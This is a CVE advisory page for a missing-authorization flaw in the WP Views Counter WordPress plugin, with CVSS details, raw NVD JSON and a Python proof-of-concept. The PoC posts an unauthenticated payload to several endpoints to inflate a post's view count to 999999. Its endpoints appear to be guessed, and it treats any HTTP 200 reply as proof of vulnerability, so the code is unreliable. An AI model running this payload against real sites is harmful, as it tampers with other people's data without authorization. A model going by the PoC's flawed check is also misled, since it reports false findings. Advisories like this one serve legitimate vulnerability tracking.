Security Vulnerability Report
中文
CVE-2025-66130 CVSS 5.3 MEDIUM

CVE-2025-66130

Published: 2025-12-16 09:15:58
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in etruel WP Views Counter wpecounter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Views Counter: from n/a through <= 2.1.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Views Counter <= 2.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66130 PoC - WP Views Counter Broken Access Control # Target: WordPress site with WP Views Counter plugin <= 2.1.2 import requests import sys target_url = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if target is vulnerable to CVE-2025-66130 Missing Authorization in WP Views Counter """ # Try to access admin functionality without authentication endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/wp/v2/views-counter", f"{target_url}/?rest_route=/wpecounter/v1/update" ] # Malicious payload to exploit broken access control malicious_payload = { 'action': 'wpecounter_update', 'post_id': '1', 'count': '999999' } print(f"[*] Testing CVE-2025-66130 on {target_url}") print(f"[*] Plugin: WP Views Counter <= 2.1.2") for endpoint in endpoints: try: response = requests.post(endpoint, data=malicious_payload, timeout=10) if response.status_code == 200: print(f"[+] Potential vulnerability found at: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) > 1: target_url = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66130", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:57.527", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in etruel WP Views Counter wpecounter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Views Counter: from n/a through <= 2.1.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wpecounter/vulnerability/wordpress-wp-views-counter-plugin-2-1-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}